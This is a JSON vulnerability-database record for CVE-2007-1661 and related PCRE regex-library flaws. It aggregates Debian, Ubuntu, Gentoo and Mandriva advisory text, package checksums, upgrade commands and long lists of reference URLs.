http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_i386.deb\n    Size/MD5 checksum:   197590 6f37a0e51e7fa6dc315f70a8f4347074\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_i386.deb\n    Size/MD5 checksum:    19348 2cb19f81e576321be69962a29ffdfa60\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_ia64.deb\n    Size/MD5 checksum:    25654 5d93dd5f45f5ba92e97d7ce1891b7800\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_ia64.deb\n    Size/MD5 checksum:   230480 5853d6946a21a1404402371ba000e010\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_ia64.deb\n    Size/MD5 checksum:    93672 51714934316405999636b65a65a06bbe\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_ia64.deb\n    Size/MD5 checksum:   280418 fb98335f69702d3fed96449fbee41eee\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mips.deb\n    Size/MD5 checksum:    20416 01c7d89a278c432b86ab97f9b1ac96a8\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mips.deb\n    Size/MD5 checksum:   253406 7ad6c3ca69bcf480ae9d1b9199d88699\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mips.deb\n    Size/MD5 checksum:   197750 17619a85539b72c20884a68e6c4c313f\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mips.deb\n    Size/MD5 checksum:    90378 288ca9b0d5b3a599cdbe7703fc4880c1\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mipsel.deb\n    Size/MD5 checksum:   252222 12c6750dcd7ed0bcfd947083981367a2\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mipsel.deb\n    Size/MD5 checksum:    90350 aee7bd92b0cffd904cd4773b38396859\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mipsel.deb\n    Size/MD5 checksum:   197412 d80633436080fed5611bb7403e9ba06f\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mipsel.deb\n    Size/MD5 checksum:    20454 d5bfe0b06780f9286eea54d184652ab4\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_powerpc.deb\n    Size/MD5 checksum:    21268 27714c1940a36759ce00479802eb1e79\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_powerpc.deb\n    Size/MD5 checksum:   197508 0eb430eb3d93bd269e1bd039553fe2f1\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_powerpc.deb\n    Size/MD5 checksum:   252890 ef3bd238d7bc96f98a6e2b7e1b4fd4c3\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_powerpc.deb\n    Size/MD5 checksum:    91972 1631a4484913482d0095921279ecbb02\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_s390.deb\n    Size/MD5 checksum:    20096 2470ee4920d007e89006c29f6657995d\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_s390.deb\n    Size/MD5 checksum:   248408 12cc9fed15c7df3927cf2b1a67e7d932\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_s390.deb\n    Size/MD5 checksum:    90404 393b5a20b3ff3994fa67b54d655a1580\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_s390.deb\n    Size/MD5 checksum:   199852 41c608c3b77965984baf8369fc195e1a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_sparc.deb\n    Size/MD5 checksum:    19410 7fbb3350f740710b851a0559b0dd037b\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_sparc.deb\n    Size/MD5 checksum:   197518 d0665f02b329c6d61715e2a35205d014\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_sparc.deb\n    Size/MD5 checksum:   247038 10cace98a25999d4a8cf15536a7e95f6\n  http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_sparc.deb\n    Size/MD5 checksum:    88598 09bb6fa7dd8ebf1d3a18b46be0e398d4\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFHL1oIXm3vHE4uyloRAst9AJ9IYwptSQJseS8EhIFA0AlapSqwhACgwkTF\nts06dbP/9f/Sc2fR26Y2NMc=\n=iaWe\n-----END PGP SIGNATURE-----\n. =========================================================== \nUbuntu Security Notice USN-547-1          November 27, 2007\npcre3 vulnerabilities\nCVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662,\nCVE-2007-4766, CVE-2007-4767, CVE-2007-4768\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 6.10\nUbuntu 7.04\nUbuntu 7.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libpcre3                        7.4-0ubuntu0.6.06.1\n  libpcrecpp0                     7.4-0ubuntu0.6.06.1\n\nUbuntu 6.10:\n  libpcre3                        7.4-0ubuntu0.6.10.1\n  libpcrecpp0                     7.4-0ubuntu0.6.10.1\n\nUbuntu 7.04:\n  libpcre3                        7.4-0ubuntu0.7.04.1\n  libpcrecpp0                     7.4-0ubuntu0.7.04.1\n\nUbuntu 7.10:\n  libpcre3                        7.4-0ubuntu0.7.10.1\n  libpcrecpp0                     7.4-0ubuntu0.7.10.1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDue to the large internal code changes needed to solve outstanding flaws,\nit was not possible to backport all the upstream security fixes to the\nearlier released versions. \n\nDetails follow:\n\nTavis Ormandy and Will Drewry discovered multiple flaws in the regular\nexpression handling of PCRE. He reported an error when processing \"\\Q\\E\" sequences with\nunmatched \"\\E\" codes that can lead to the compiled bytecode being\ncorrupted (CVE-2007-1659). Further improper calculations of\nmemory boundaries were reported when matching certain input bytes\nagainst regex patterns in non UTF-8 mode (CVE-2007-1661) and when\nsearching for unmatched brackets or parentheses (CVE-2007-1662). PCRE does not properly handle \"\\P\" and\n\"\\P{x}\" sequences which can lead to heap-based buffer overflows or\ntrigger the execution of infinite loops (CVE-2007-4767), PCRE is also\nprone to an error when optimizing character classes containing a\nsingleton UTF-8 sequence which might lead to a heap-based buffer\noverflow (CVE-2007-4768). \n\nChris Evans also reported multiple integer overflow vulnerabilities in\nPCRE when processing a large number of named subpatterns (\"name_count\")\nor long subpattern names (\"max_name_size\") (CVE-2006-7227), and via\nlarge \"min\", \"max\", or \"duplength\" values (CVE-2006-7228) both possibly\nleading to buffer overflows. Another vulnerability was reported when\ncompiling patterns where the \"-x\" or \"-i\" UTF-8 options change within\nthe pattern, which might lead to improper memory calculations\n(CVE-2006-7230). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll PCRE users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libpcre-7.3-r1\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2006-7227\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7227\n  [ 2 ] CVE-2006-7228\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228\n  [ 3 ] CVE-2006-7230\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7230\n  [ 4 ] CVE-2007-1659\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659\n  [ 5 ] CVE-2007-1660\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660\n  [ 6 ] CVE-2007-1661\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661\n  [ 7 ] CVE-2007-1662\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662\n  [ 8 ] CVE-2007-4766\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766\n  [ 9 ] CVE-2007-4767\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767\n  [ 10 ] CVE-2007-4768\n         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200711-30.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2007 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license.  This update ensures that\nkazehakase  uses that supported library, and not its own embedded and\ninsecure version. \n\nWe recommend that you upgrade your kazehakase package. \n \n Updated packages have been patched to prevent this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.1:\n e3eadb5dc3ae91ffc735a0021bb4c3b8  2007.1/i586/libpcre-devel-7.3-0.1mdv2007.1.i586.rpm\n 8eee92b33ed6f6be95cae33249242dfa  2007.1/i586/libpcre0-7.3-0.1mdv2007.1.i586.rpm\n 42e1ac0e8188b5f142e645c1ff6bb44d  2007.1/i586/pcre-7.3-0.1mdv2007.1.i586.rpm \n a03dca7708aa437655a393b0fe66f3c0  2007.1/SRPMS/pcre-7.3-0.1mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n 370f8de2c9166883cbbcb2968b0575ec  2007.1/x86_64/lib64pcre-devel-7.3-0.1mdv2007.1.x86_64.rpm\n 306b2a144a25e1025d4ed02f3878b9dc  2007.1/x86_64/lib64pcre0-7.3-0.1mdv2007.1.x86_64.rpm\n 29b00561151987446eaaa3f0aaac5684  2007.1/x86_64/pcre-7.3-0.1mdv2007.1.x86_64.rpm \n a03dca7708aa437655a393b0fe66f3c0  2007.1/SRPMS/pcre-7.3-0.1mdv2007.1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFHM08lmqjQ0CJFipgRAvYTAKC+/5/D4RgCUnWInSK3iWw02iIZhACgliaH\ngo5yp5LfVMY1jIk+EpEQgy0=\n=vGOF\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "BID",
            "id": "26346"
          },
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "db": "PACKETSTORM",
            "id": "60696"
          },
          {
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "db": "PACKETSTORM",
            "id": "61164"
          },
          {
            "db": "PACKETSTORM",
            "id": "66037"
          },
          {
            "db": "PACKETSTORM",
            "id": "60800"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2007-1661",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "26346",
            "trust": 2.8
          },
          {
            "db": "SECUNIA",
            "id": "28136",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "27543",
            "trust": 2.5
          },
          {
            "db": "USCERT",
            "id": "TA07-352A",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "27554",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28406",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28720",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28714",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "28414",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "30155",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "29267",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "29420",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "30219",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27538",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27697",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27773",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "27741",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "30106",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-4238",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-3790",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-3725",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-0924",
            "trust": 1.7
          },
          {
            "db": "XF",
            "id": "38274",
            "trust": 1.4
          },
          {
            "db": "USCERT",
            "id": "SA07-352A",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "TA08-079A",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA08-079A",
            "trust": 0.8
          },
          {
            "db": "SECTRACK",
            "id": "1019116",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064",
            "trust": 0.8
          },
          {
            "db": "DEBIAN",
            "id": "DSA-1570",
            "trust": 0.6
          },
          {
            "db": "DEBIAN",
            "id": "DSA-1399",
            "trust": 0.6
          },
          {
            "db": "MANDRIVA",
            "id": "MDKSA-2007:211",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200801-19",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200801-02",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200711-30",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200805-11",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200801-18",
            "trust": 0.6
          },
          {
            "db": "APPLE",
            "id": "APPLE-SA-2007-12-17",
            "trust": 0.6
          },
          {
            "db": "APPLE",
            "id": "APPLE-SA-2008-03-18",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2008-1842",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20071112 FLEA-2007-0064-1 PCRE",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20071106 RPSA-2007-0231-1 PCRE",
            "trust": 0.6
          },
          {
            "db": "XF",
            "id": "8",
            "trust": 0.6
          },
          {
            "db": "SUSE",
            "id": "SUSE-SA:2007:062",
            "trust": 0.6
          },
          {
            "db": "UBUNTU",
            "id": "USN-547-1",
            "trust": 0.6
          },
          {
            "db": "CERT/CC",
            "id": "TA07-352A",
            "trust": 0.6
          },
          {
            "db": "MLIST",
            "id": "[GTK-DEVEL-LIST] 20071107 GLIB 2.14.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-25023",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "60696",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "61268",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "61164",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "66037",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "60800",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "db": "BID",
            "id": "26346"
          },
          {
            "db": "PACKETSTORM",
            "id": "60696"
          },
          {
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "db": "PACKETSTORM",
            "id": "61164"
          },
          {
            "db": "PACKETSTORM",
            "id": "66037"
          },
          {
            "db": "PACKETSTORM",
            "id": "60800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "id": "VAR-200711-0560",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-25023"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T22:23:54.588000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Security Update 2007-009",
            "trust": 0.8,
            "url": "http://docs.info.apple.com/article.html?artnum=307179-en"
          },
          {
            "title": "Security Update 2008-002",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT1249"
          },
          {
            "title": "Security Update 2007-009",
            "trust": 0.8,
            "url": "http://docs.info.apple.com/article.html?artnum=307179-ja"
          },
          {
            "title": "Security Update 2008-002",
            "trust": 0.8,
            "url": "http://support.apple.com/kb/HT1249?viewlocale=ja_JP\u0026locale=ja_JP"
          },
          {
            "title": "Version 7.3 28-Aug-07",
            "trust": 0.8,
            "url": "http://www.pcre.org/changelog.txt"
          },
          {
            "title": "TA07-352A",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta07-352a.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-DesignError",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/26346"
          },
          {
            "trust": 2.5,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-352a.html"
          },
          {
            "trust": 2.5,
            "url": "http://secunia.com/advisories/27543"
          },
          {
            "trust": 2.5,
            "url": "http://secunia.com/advisories/28136"
          },
          {
            "trust": 1.8,
            "url": "http://security.gentoo.org/glsa/glsa-200711-30.xml"
          },
          {
            "trust": 1.7,
            "url": "http://lists.apple.com/archives/security-announce/2007/dec/msg00002.html"
          },
          {
            "trust": 1.7,
            "url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html"
          },
          {
            "trust": 1.7,
            "url": "http://docs.info.apple.com/article.html?artnum=307179"
          },
          {
            "trust": 1.7,
            "url": "http://docs.info.apple.com/article.html?artnum=307562"
          },
          {
            "trust": 1.7,
            "url": "http://www.pcre.org/changelog.txt"
          },
          {
            "trust": 1.7,
            "url": "https://issues.rpath.com/browse/rpl-1738"
          },
          {
            "trust": 1.7,
            "url": "http://www.debian.org/security/2007/dsa-1399"
          },
          {
            "trust": 1.7,
            "url": "http://www.debian.org/security/2008/dsa-1570"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-march/msg00181.html"
          },
          {
            "trust": 1.7,
            "url": "http://security.gentoo.org/glsa/glsa-200801-02.xml"
          },
          {
            "trust": 1.7,
            "url": "http://security.gentoo.org/glsa/glsa-200801-18.xml"
          },
          {
            "trust": 1.7,
            "url": "http://security.gentoo.org/glsa/glsa-200801-19.xml"
          },
          {
            "trust": 1.7,
            "url": "http://security.gentoo.org/glsa/glsa-200805-11.xml"
          },
          {
            "trust": 1.7,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2007:211"
          },
          {
            "trust": 1.7,
            "url": "http://bugs.gentoo.org/show_bug.cgi?id=198976"
          },
          {
            "trust": 1.7,
            "url": "http://mail.gnome.org/archives/gtk-devel-list/2007-november/msg00022.html"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27538"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27554"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27697"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27741"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/27773"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28406"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28414"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28714"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/28720"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/29267"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/29420"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/30106"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/30155"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/30219"
          },
          {
            "trust": 1.7,
            "url": "http://www.novell.com/linux/security/advisories/2007_62_pcre.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.frsirt.com/english/advisories/2007/3725"
          },
          {
            "trust": 1.4,
            "url": "http://xforce.iss.net/xforce/xfdb/38274"
          },
          {
            "trust": 1.4,
            "url": "http://www.frsirt.com/english/advisories/2007/4238"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/483357/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/483579/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://usn.ubuntu.com/547-1/"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/3725"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/3790"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2007/4238"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0924/references"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38274"
          },
          {
            "trust": 1.0,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1661"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta07-352a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta08-079a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta07-352a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta08-079a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1661"
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1019116"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa07-352a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html"
          },
          {
            "trust": 0.6,
            "url": "http://www.ubuntulinux.org/support/documentation/usn/usn-547-1"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/483579/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/483357/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/0924/references"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2007/3790"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1661"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4766"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1662"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1660"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4768"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4767"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1659"
          },
          {
            "trust": 0.3,
            "url": "http://scary.beasts.org/security/cesa-2007-006.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.pcre.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.adobe.com/support/security/bulletins/apsb08-13.html"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2007-488.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2007-505.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-281.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=745016"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2007-0967.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2007-0968.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2007-1063.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2007-1065.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2007-1068.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0546.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-238305-1"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-239286-1"
          },
          {
            "trust": 0.3,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-01/msg00006.html"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.2,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.2,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1660"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1662"
          },
